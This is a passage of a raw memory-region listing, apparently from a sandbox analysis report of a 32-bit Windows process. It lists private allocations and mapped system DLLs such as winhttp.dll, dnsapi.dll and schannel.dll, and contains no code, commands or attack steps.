2748 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2749 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2750 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2751 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2752 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2753 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2754 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2755 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2756 start_va = 0x5140000 end_va = 0x5140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2757 start_va = 0x5140000 end_va = 0x5148fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2758 start_va = 0x5140000 end_va = 0x5140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2759 start_va = 0x5140000 end_va = 0x5148fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2760 start_va = 0x5140000 end_va = 0x5140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2761 start_va = 0x5140000 end_va = 0x5148fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2762 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2763 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2764 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2765 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2766 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2767 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2768 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2769 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2770 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2771 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2772 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2773 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2774 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2775 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2776 start_va = 0x5160000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2777 start_va = 0x5170000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2778 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2779 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2780 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2781 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2782 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2783 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2784 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2785 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2786 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2787 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2788 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2789 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2790 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2791 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2792 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2793 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2794 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2795 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2796 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2797 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2798 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2799 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2800 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2801 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2802 start_va = 0x5160000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2803 start_va = 0x5170000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2804 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2805 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2806 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2807 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2808 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2809 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2810 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2811 start_va = 0x5160000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2812 start_va = 0x5170000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2813 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2814 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2815 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2816 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2817 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2818 start_va = 0x5160000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2819 start_va = 0x5170000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2820 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2821 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2822 start_va = 0x5310000 end_va = 0x531ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 2823 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2824 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2825 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2826 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2827 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2828 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2829 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2830 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2831 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2832 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2833 start_va = 0x5320000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 2834 start_va = 0x5360000 end_va = 0x545ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 2836 start_va = 0x2030000 end_va = 0x2032fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 2838 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2839 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2840 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2841 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2842 start_va = 0x5140000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2843 start_va = 0x5320000 end_va = 0x541ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 2848 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2849 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2850 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2851 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2855 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2856 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2857 start_va = 0x5140000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2858 start_va = 0x5320000 end_va = 0x541ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 2864 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2865 start_va = 0x65660000 end_va = 0x65704fff monitored = 0 entry_point = 0x6567ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 2866 start_va = 0x65a30000 end_va = 0x65a52fff monitored = 0 entry_point = 0x65a35570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 2867 start_va = 0x65a20000 end_va = 0x65a2ffff monitored = 0 entry_point = 0x65a23820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 2868 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2869 start_va = 0x5140000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2870 start_va = 0x5320000 end_va = 0x541ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 2871 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2872 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 2873 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2874 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2875 start_va = 0x6a860000 end_va = 0x6a872fff monitored = 0 entry_point = 0x6a8625d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2876 start_va = 0x6a840000 end_va = 0x6a853fff monitored = 0 entry_point = 0x6a843c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2877 start_va = 0x5420000 end_va = 0x545ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 2878 start_va = 0x5460000 end_va = 0x555ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 2879 start_va = 0x5560000 end_va = 0x5570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005560000" filename = "" Region: id = 2880 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2881 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2882 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2883 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2884 start_va = 0x6fdf0000 end_va = 0x6fdf9fff monitored = 0 entry_point = 0x6fdf3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2885 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2886 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 2887 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2888 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 2889 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 2890 start_va = 0x5580000 end_va = 0x55bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 2891 start_va = 0x55c0000 end_va = 0x56bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 2892 start_va = 0x56c0000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 2893 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 2894 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2895 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2896 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2897 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2898 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2899 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2900 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2901 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2902 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2903 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2904 start_va = 0x5800000 end_va = 0x580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2905 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2906 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2907 start_va = 0x5800000 end_va = 0x580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2908 start_va = 0x5800000 end_va = 0x580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2909 start_va = 0x5800000 end_va = 0x580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2910 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2911 start_va = 0x5180000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2912 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2913 start_va = 0x5180000 end_va = 0x5180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 2914 start_va = 0x5800000 end_va = 0x58bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005800000" filename = "" Region: id = 2915 start_va = 0x5180000 end_va = 0x5183fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 2916 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2917 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2918 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2919 start_va = 0x58c0000 end_va = 0x58cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 2920 start_va = 0x58d0000 end_va = 0x58dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 2921 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2922 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2923 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2924 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2925 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2926 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2927 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2928 start_va = 0x5300000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2929 start_va = 0x6b1d0000 end_va = 0x6b218fff monitored = 0 entry_point = 0x6b1d6450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 2930 start_va = 0x58c0000 end_va = 0x593ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 2931 start_va = 0x5940000 end_va = 0x5950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005940000" filename = "" Region: id = 2932 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2933 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2934 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2935 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2936 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2937 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2938 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2939 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2940 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2941 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2942 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2943 start_va = 0x47b0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 2944 start_va 